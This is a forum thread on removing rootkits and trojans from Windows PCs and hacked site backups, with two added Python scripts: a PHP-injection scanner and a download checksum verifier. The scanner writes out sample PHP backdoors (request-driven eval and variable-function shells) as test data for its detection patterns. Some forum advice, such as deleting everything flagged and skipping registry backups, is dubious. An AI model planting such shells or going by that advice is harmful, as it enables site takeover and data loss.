Get rid of Rootkits Scum Virus Trojans Guide

21 replies
We posted this in a few private messages & elsewhere and have noticed that there are a lot of Warriors with hacked / rootkit / scumware issues...

http://www.warriorforum.com/search.php?searchid=7825255

http://www.warriorforum.com/main-int...nt-hacked.html

>>>>>>>>

It is likely that you took the hack with you to your new host. It is also likely that the zebra code that is causing this in your / any files is from an injection into a theme / plugin / PHP file that has been modified before upload / download, either remotely or locally.

Stop uploading your backups / files / themes / plugins / content and sort the local issue out first.

Download and run these in this order:

Download these to a root folder on your C: drive for access later...

A: Kaspersky rootkit killa FREE - http://devbuilds.kaspersky-labs.com/..._rescue_10.iso

B: Avast FREE ver6 - Avast Free Antivirus (Download.com). SAY NO TO ANY UPGRADES OR EXTRA $

C: Malwarebytes Anti-Malware FREE - http://files1.majorgeeks.com/files/8...mbam-setup.exe

D: Spybot FREE - http://dl.betanews.com/spybotsd162.exe

E: CCleaner FREE - http://download.piriform.com/ccsetup304.exe

1) Burn this .ISO to a CD, change your boot sequence to boot from CD, and run the Kaspersky GUI. It will be slowish as it is installing a "safe level" between your BIOS and Windows platform. Run it, making sure it is scanning ALL hard drives; it will take a while, but it will find scum you never thought you had!

2) Restart your computer, changing the boot sequence back to boot from the Windows hard drive, and press F5 or F8 (depending on which version of Windows you have) so the PC boots into SAFE MODE without NETWORKING. If you miss it, quickly reset the power and press F5 or F8 again until you catch it. Once in safe mode, run the Windows program uninstaller and remove ALL or ANY antivirus / firewall software, even if you have paid for it! Then run (B) as above: install it and configure it to do a "scheduled scan on reboot", ensuring you again choose ALL HARD DRIVES. Reboot the PC; it will load a BLACK DOS-looking screen that will scan everything (it might take a long time, so maybe a chance to hand-write some new IM articles on your niche!). It should delete all the scum on its own; sometimes it will ask "delete these?", so say yes to EVERYTHING it finds.

3) The PC will now be in full mode, with a web connection. Locate item (C) in your download folder, install it, run it and let it delete all it finds (it may do it for you), or delete everything it finds yourself. CLOSE PROGRAM.

4) Install item (D), run it, choose update and let it update all the definitions it finds. Restart Spybot, run it to check for any problems, and delete all it finds.

5) Install item (E). Run the cleaner part of the program FIRST and delete all it finds (it may do this for you), then run "clean registry" (2nd button on the left); it may take a while. Then choose "fix all"; when it asks whether you want to back up the registry items found, say NO. Once finished, close the program.

6) Now is the good bit: you should have successfully found loads of SCUM and CRAP you thought would never be there. Even 1 scum file can redownload scum programs back onto your drive as soon as you go online / run a snide program you may have downloaded on the sly, so DO A FULL WINDOWS BACKUP to an external drive and then MAKE A NEW WINDOWS RESTORE POINT and label it something like "CLEAN MARCH 2011". This way, if you do FTP any crap down or up from your host / anywhere, you will have a clean PC to restore, without having to do all the above again!

7) Now once this is all done, choose update definitions on Avast and run a full scan on your "FTP / WP / UPLOAD" folders on your local drive (the ones that have your work / sites / potentially hacked files in) at least TWICE!

There we go. You can do more than the above, but this is what we have in one of our Jacked Guides for members and clients who we consult for, and it works most of the time.

Now if you want to invest a good $30-odd, you really need this (direct link, no hop): Prevx - Customer and Network Security and Breach Management. It simply puts all other attempts to stop SCUM on your PC to shame. Run it after all the above and you will still more than likely find even more stuff it will delete; the really CLEVER thing about this is the realtime power, nothing comes close!

Hope that helps you / everyone!

Flip
#guide #rid #rootkits #scum #trojans #virus
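Step 7 above runs an antivirus over the local "FTP / WP / UPLOAD" folders, but antivirus signatures are weak at spotting the theme / plugin / PHP injection the post opens with. The following is an added example, not code from the original post or from any of the tools it lists: a small scanner that walks a local site backup and flags the usual signs of an injected PHP file (eval() of a decoded payload, a long base64 literal, a variable function fed straight from $_GET / $_POST / $_REQUEST, a hidden iframe, and any .php file sitting under an uploads directory). The indicator list, the directory names, the script name `scan_site.py` and the sample files it builds in a temp folder are all constructed for the demonstration.

```python
"""Walk a local site backup and flag files that look like they carry injected PHP.

Added illustration for this thread; the indicator patterns, directory names and
sample files are constructed, not taken from the original post or any listed tool.
"""
import base64
import re
import sys
import tempfile
from pathlib import Path

PHP_EXT = {".php", ".phtml", ".php5", ".inc"}
WEB_EXT = {".html", ".htm", ".js"}

# Typical signs of an injected / obfuscated PHP payload (constructed list).
INDICATORS = [
    (re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "eval of decoded payload"),
    (re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace with /e modifier"),
    (re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[", re.I),
     "variable function called on request input"),
    (re.compile(r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden)", re.I),
     "hidden iframe"),
    (re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{200,}", re.I),
     "long base64 literal"),
]


def scan_file(path):
    """Return [(line_number, reason), ...] for every indicator hit in one file."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern, reason in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, reason))
    return findings


def scan_tree(root):
    """Map each suspicious file (path relative to root) to its findings."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        ext = path.suffix.lower()
        findings = []
        if ext in PHP_EXT:
            findings.extend(scan_file(path))
            # A web server should never have executable PHP under the media directory.
            if "uploads" in rel.parts:
                findings.append((0, "PHP file inside an uploads directory"))
        elif ext in WEB_EXT:
            findings.extend(scan_file(path))  # hidden iframes land in HTML/JS too
        if findings:
            report[rel.as_posix()] = findings
    return report


def build_sample_tree():
    """Constructed sample backup: one clean file, two injected files, one rogue upload."""
    root = Path(tempfile.mkdtemp(prefix="site-backup-"))
    payload = base64.b64encode(b"if(isset($_REQUEST['c'])){eval($_REQUEST['c']);}" * 5).decode()
    files = {
        "wp-content/themes/mytheme/index.php": "<?php\nget_header();\nget_footer();\n",
        "wp-content/themes/mytheme/header.php":
            f'<?php eval(base64_decode("{payload}")); ?>\n<?php\nwp_head();\n',
        "wp-content/themes/mytheme/footer.php":
            '<?php wp_footer(); ?>\n'
            '<iframe src="http://example.invalid/x" style="display:none"></iframe>\n',
        "wp-content/uploads/2011/03/image.php":
            "<?php $f = $_REQUEST['f']; $f($_REQUEST['a']); ?>\n",
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    # Usage: python scan_site.py /path/to/local/backup   (no argument: scan the sample tree)
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for rel, findings in scan_tree(target).items():
        for lineno, reason in findings:
            where = f"line {lineno}" if lineno else "whole file"
            print(f"{rel}: {where}: {reason}")
```

A hit is a reason to open the file, not proof of compromise: some legitimate plugins do call base64_decode, so compare any flagged file against a fresh copy from the theme or plugin author before restoring it, and treat anything flagged in a backup taken after the hack as part of the hack.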
  • Ruka
    This looks great DaddyKool, thank you for posting it.

    Agree with you on the Prevx, I have it and love it.

    Could I ask a few questions?

    Will this sequence remove any nasties hidden away in files on my computer (eg. on a portable hard drive? Or if I had a back up of a website saved onto that hard drive, would it remove any viruses trojans etc?)

    And - I don't mind spending cash on security solutions, just want the most secure environment.

    Are you saying that the free options you mention above are the best, even if I don't mind paying?

    Or if not, what are the products I should buy? (I have a broadband deal with McAfee installed for free on my machine, but am happy to purchase something better)

    thanks so much
    • daddykool
      No Probs!

      Originally Posted by chickenlittle:

      This looks great DaddyKool, thank you for posting it.

      Agree with you on the Prevx, I have it and love it.

      Best on the current market, other than buying a MAC!

      Could I ask a few questions?

      Will this sequence remove any nasties hidden away in files on my computer (eg. on a portable hard drive? Or if I had a back up of a website saved onto that hard drive, would it remove any viruses trojans etc?)

      If you run in the rough order above, steps 1 & 2 will actually check whatever devices (USB, external, Zip) you mark them to check; it has been surprising what the boot CD will find!!! The clever thing about running step 2 after a rootkit scan with step 1 is that IF you do have any SCUMware that reinstalls on a full boot... AVAST will find it, as you have already cleaned the MBR (master boot records) of ALL storage devices.

      And - I don't mind spending cash on security solutions, just want the most secure environment.

      Are you saying that the free options you mention above are the best, even if I don't mind paying?

      Most of the PAID solutions in security / scanning / blahdy blah are using the EXACT same scripted engines as the FREE versions. Yes, you get a few singing and dancing extras, but seriously, we have yet to NOT find scum using the methods from our guides. Must work well, as we get paid to carry it out a lot, both locally and remotely.

      Or if not, what are the products I should buy? (I have a broadband deal with McAfee installed for free on my machine, but am happy to purchase something better)

      In true IM Warrior style we could say ALL of them! But no, spend nothing: all the products are currently FREE and they all use the same updater engine for definitions, BUT we would recommend a donation for the full version of Malwarebytes as it rocks and works well!



      thanks so much
      More than welcome. Let us know what the sequence finds on your machines; it will, trust us! One client who had spent about $1200 on software and hardware protection ran just CCleaner & the Rootkit Boot CD and found 143 SERIOUS hidden infections! The worst offenders in all this are crappy social sites and links on the fan pages; they lead to drive-by downloads that reside until needed by the h4cker to start "funny stuff" on your DSL line!

      What OS are you running?
      Signature
      LAUNCHING VERY SOON > PRE-REGISTER NOW FOR A WSO THAT EVERY WARRIOR NEW & OLD CAN MAKE $$$ FROM! LIMITED PRE-LAUNCH SPACES - PM or email: JVSuperstars@gmx.com TO RESERVE A PLACE & LOCK IN A SUPER LOW LIFETIME PRICE! *** NEVER TO BE REPEATED PRICE ONLY AVAILABLE ON THE WARRIOR FORUM & OUR VERIFIED JV AFFILIATE PROVIDERS! ***
  • Ruka
    This is great. I am going to scan my PC and my laptop with your instructions. At last I have a workable plan to fix any underlying issues - thank you thank you

    I am running Windows Vista on both of them. McAfee on both of them.

    So, to be clear, shall I just remove McAfee from my systems altogether, or shall I leave it on?

    And I have Spy Sweeper from Webroot, I find it's good for flagging up websites that are possibly harmful. Should I leave this on or should I remove it?

    And - will Avast become my main anti-virus software after completing your instructions - should I schedule a weekly scan with it?
  • Floyd Fisher
    Daddykool:

    Your guide violates the first rule of virus safety.

    Never download... let alone run... an antivirus program to an infected machine!

    The reason is simple: whatever you are infected with will simply infect the antivirus you download, continuing the cycle.

    If you are going to download said utilities, find a known clean machine, and download and burn to a CD from there.

    Also, I wouldn't even bother doing this until after I attempted to detect the problems using an online virus scanner. My steps:

    1. Do an online scan first.
    2. Follow this guide, except do the download and burn from a known clean machine.
    3. Self-detection using known symptoms (written down with paper and pencil, and pay close attention) run through a search engine like Google.

    You can change steps two and three as you feel like it, but always do step one first, and save yourself some pain.
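Floyd's point (fetch the tools from a known-clean machine and burn them there) has a natural follow-up that the thread does not spell out: once the files are on the CD or USB stick, check that what you burned is what the vendor published. The following is an added example, not code from the original post or from any vendor. It assumes the vendor publishes a sha256sum-style manifest (`<hex digest>  <filename>`, or `<hex digest> *<filename>` for binary mode), which the links in this thread do not show; the download folder, file contents, manifest and the script name `verify_downloads.py` are constructed so it runs offline.

```python
"""Check downloaded rescue / cleanup tools against a checksum manifest before burning or running them.

Added illustration for this thread; it assumes the vendor publishes a sha256sum-style
manifest, and the sample folder, contents and manifest below are constructed.
"""
import hashlib
import sys
import tempfile
from pathlib import Path

HEX = set("0123456789abcdef")


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks so a multi-hundred-MB ISO never sits in memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def parse_manifest(text):
    """Parse sha256sum output: '<hex>  <name>' (text mode) or '<hex> *<name>' (binary mode)."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition(" ")
        name = name.lstrip(" ")
        if name.startswith("*"):
            name = name[1:]
        digest = digest.lower()
        if not sep or not name or len(digest) != 64 or set(digest) - HEX:
            raise ValueError(f"malformed manifest line: {raw!r}")
        entries[name] = digest
    return entries


def verify_downloads(folder, manifest_text):
    """Return {filename: 'OK' | 'MISMATCH' | 'MISSING' | 'UNLISTED'} for the download folder."""
    folder = Path(folder)
    expected = parse_manifest(manifest_text)
    results = {}
    for name, digest in expected.items():
        path = folder / name
        if not path.is_file():
            results[name] = "MISSING"
        elif sha256_of(path) == digest:
            results[name] = "OK"
        else:
            results[name] = "MISMATCH"
    # Files the manifest cannot vouch for are reported rather than silently ignored.
    for path in sorted(folder.iterdir()):
        if path.is_file() and path.name not in expected:
            results[path.name] = "UNLISTED"
    return results


def build_sample_downloads():
    """Constructed sample: one good file, one tampered file, one missing, one unlisted."""
    folder = Path(tempfile.mkdtemp(prefix="clean-downloads-"))
    good_iso = b"stand-in for the rescue ISO (constructed bytes)"
    good_installer = b"stand-in for the Malwarebytes installer (constructed bytes)"
    (folder / "rescue.iso").write_bytes(good_iso)
    (folder / "mbam-setup.exe").write_bytes(good_installer + b"\x00TAMPERED")
    (folder / "ccsetup304.exe").write_bytes(b"not covered by the manifest")
    manifest = "\n".join([
        "# SHA256SUMS fetched on the clean machine (constructed)",
        f"{hashlib.sha256(good_iso).hexdigest()} *rescue.iso",
        f"{hashlib.sha256(good_installer).hexdigest()}  mbam-setup.exe",
        f"{hashlib.sha256(b'spybot installer bytes').hexdigest()}  spybotsd162.exe",
    ])
    return folder, manifest


if __name__ == "__main__":
    # Usage: python verify_downloads.py /path/to/downloads SHA256SUMS   (no args: run the sample)
    if len(sys.argv) == 3:
        folder, manifest = sys.argv[1], Path(sys.argv[2]).read_text()
    else:
        folder, manifest = build_sample_downloads()
    for name, status in verify_downloads(folder, manifest).items():
        print(f"{status:9} {name}")
```

Get the manifest over a different channel than the download itself (the vendor's own HTTPS page, opened on the clean machine, rather than the mirror that served the file), since a mirror that can tamper with an ISO can just as easily rewrite a checksum file sitting next to it. A MISMATCH means burn nothing and download again; an UNLISTED file is one the manifest cannot vouch for, so it gets no place on the rescue media.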
    • daddykool
      Originally Posted by Floyd Fisher:

      Your guide violates the first rule of virus safety.

      Never download... let alone run... an antivirus program to an infected machine!
      Thanks for the input there Floyd, but there are no rules when it comes to scumware & viruses. Keep in mind most viruses are harmless GUI injectors and it is the rootkits and drive-bys that cause the scumware!

      As you can see, the first step is NOT online and is the ONLY way, apart from formatting or a new drive, to actually get rid of today's scumware in the right order to retain your precious info.

      Yes, by all means run an online scan after steps 1 & 2; anything before is wasted time.

      Being online only heightens the chances of infection / drive-bys / reinjection. Most online scanners do not even scope the bytes on the MBR, hence you cannot find them, thus you go back online after you think "hey, I am all nice and clean" and BAM, KERPOW, KERCHANG, you are back where you started.

      The GUI that the rootkit CD / USB uses is Linux based, hence NO boot sectors, no master boot records, no CMOS or onboard chip injections. We have not had one single client who has run even just some of the guide not find some form of scum; even some safe sandbox machines running a Windows OS from a CD/DVD have been highlighted with scum!

      The boot CD is ha5h protected; you cannot burn anything else on to it from the ISO, as the footprint when booting will not allow it to run when it matches the length of the bytes.

      Thanks again Floyd, love the suggestion of a pen and paper; just remind all the n00bs what they are again, Bud!
        • Floyd Fisher
        Originally Posted by daddykool:

        Thanks for the input there Floyd, but there are no rules when it comes to Scumware & viruses, keep in mind most viruses are harmless GUI injectors and it is the rootkits and drivebys that cause the scumware!
        Sorry, but I have to respectfully disagree here.

        Your approach to this is like playing Russian roulette... do you really want to take that chance the malware won't infect the antivirus you are downloading?

        Not me pal....I don't care if the chances are one in a billion...that's a lottery I don't need a chance at winning....because in this case, winning flat out sucks.

        And the reason I say do an online scan first is simple: My approach to troubleshooting and repair has always involved doing the simple stuff first, then going deeper only as necessary. I don't know about you, but my time is kinda important to me...and every second I'm not wasting chasing a computer nasty is a second I can turn to doing something much more important...like making money.
  • ecdavis
    Hi. I apologize, but I have a very basic question: in step 1 above, how do you change the boot sequence to boot from a CD, or does this happen automatically when you insert the CD?
    • Floyd Fisher
      Originally Posted by ecdavis:

      Hi. I apologize, but I have a very basic question: In step 1 above, how do you change the boot sequence to boot from a cd or does this happen automatically when you insert the cd?
      That is a switch you must make through the BIOS.

      When you first turn your computer on, just hit F10 until you get to the BIOS screen.
  • daddykool
    That's why we do it this way round; never had a client's machine / server reinfected or reinjected either.

    Get where you're going Floyd, but as we stated, this is an offline answer to an online problem; there is no chance of infection from steps 1 & 2 as you are neither online nor in a Windows OS environment. Once you get into step 3, then an online scan is worth the time, but as said, the engine is the same.

    We got an email from a Warrior and have asked them to post what they did if they want to, but they found 5 rootkits and 2 MBR password injectors, just on one laptop! So glad it's helping.

    Guys, mix up our notes with Floyd's and you will have a clean machine one way or the other :-)

    BIOS may also be activated by F1 / F2 / F8 or, as Floyd has stated, F10. Once in, just change your boot sequence from your hard drive to the CD or DVD device; you can even disable the hard drive in the boot sequence to make super sure the boot record is not accessed in any way.

    Time is defo money, but we have lots of time, bud!
  • ecdavis
    Floyd and Flip,

    Thank you. So I start up the computer, hit F10 until I get to the BIOS screen and then change the boot sequence. After I change the boot sequence, do I then insert the CD, or do I shut down and then restart with the CD in the drive?

    Evan
    • Floyd Fisher
      Originally Posted by ecdavis:

      Floyd and Flip,

      Thank you. So I start up the computer, hit F10 until I get to the bios screen and then change boot sequence. After I change the boot sequence to I then insert the cd, or do I shut down and then re-start with cd in drive?

      Evan
      Just stick the CD into the drive, navigate through the BIOS to the option 'save settings and reboot'... and use that.
  • ecdavis
    Floyd,

    Thank you. Got it!

    Evan
    • daddykool
      Once the boot CD starts, Evan, you will see a graphical user interface start up. It will take a while, but it's roughly the same as an early version of Windows or the PlayStation 3 type panel. It will ask you what drives you want to scan; let it do its thing and then move on to step 2.
  • ecdavis
    Flip,

    Thank you. This really helps. I now feel confident that I can do this. Normally this sort of thing causes my hair to ignite.
    • daddykool
      Originally Posted by ecdavis:

      Flip,

      Thank you. This really helps. I now feel confident that I can do this. Normally this sort of thing causes my hair to ignite.
      The hair remark had me in stitches Buddy!

      Imagine a virus / rootkit that, when you delete it, makes your hair catch light! Is that the future in scumware lol

      Glad it helps; if you feel in control of your PC, you're in control of your IMing.
  • daddykool
    NOTE:

    When you start step 1 of the rough guide, you are using a boot CD that has got nothing to do with the crappy old Microsoft, full-of-problems Windows operating system! It is a Linux Gentoo-built CD that completely ignores any Windows installs on any hard drives attached at the time of boot; this way it gets into searching and scanning the actual drives without your existing viruses / rootkits / malware / blahdy blah problems that exist on most Windows machines (without the owner even knowing!)

    I have had some emails with requests to help outside of WF with sorting what sounds like some very serious rootkit and trojan issues; on some, by the info supplied, they have even been suckered into being in a botnet (check Wiki if you do not know what it is). I can help, but please follow the guide above, print it out and download everything you need to your root C: drive, and you can do it for FREE!
  • Steve Faber
    Originally Posted by daddykool:

    A: Kaspersky rootkit killa FREE - http://devbuilds.kaspersky-labs.com/..._rescue_10.iso

    B: Avast FREE ver6 - Avast Free Antivirus (Download.com). SAY NO TO ANY UPGRADES OR EXTRA $

    C: Malwarebytes Anti-Malware FREE - http://files1.majorgeeks.com/files/8...mbam-setup.exe

    D: Spybot FREE - http://dl.betanews.com/spybotsd162.exe

    E: CCleaner FREE - http://download.piriform.com/ccsetup304.exe
    I use B, C, and D on a regular basis and I agree, it's a great combination. Thanks for the info; it's only too bad that we need any of it!
    Signature
    For Killer Marketing Tips that Will Grow Your Business Follow Me on Twitter Now
    After all, you're probably following a few hundred people already that aren't doing squat for you.....
  • daddykool
    Great to hear it's helped even though you have them, and you are so right when you say it's too bad they are needed LOL

    It's either that or go to the dark side... buy a MAC!
    • olamilekan2
      Daddykool, thanks for this great post. Can you help me here? My PC got infected with a Trojan, then I used SuperAntiSpam software to remove it, but when I want to run some programs with .exe on my PC, I cannot, and this only happens after I have done the Trojan removal. What do you suggest I can do?

      Thank you in advance

      Moruf
  • daddykool
    Do not run anything SuperAnti anything!!! Most call-to-software platforms are littered with malware/trojans/rootkits and even master boot makers!

    Run the steps exactly as above and it will get rid of ALL the crap!

    In step one you are not actually using your Windows OS in any way; this is the only TRUE way to get shot of all the crap and scumware, apart from running a Linux machine!!!!

    Let us know how you get on!
    • pctutor
      (Daddykool - thanks for your kind offer to have me mention my guide here!)

      I am a computer tech, and I get calls pretty regularly from people who are in a panic about a virus or spyware that just popped up on their screen. I have put together a step-by-step guide (including lots of screenshots) of the process I use to get rid of these annoyances. This is paint-by-number easy in most cases.

      Check it out here. The price is going up this weekend. At some point it will be a WSO but not sure exactly when.

      Stay safe everyone -

      Scott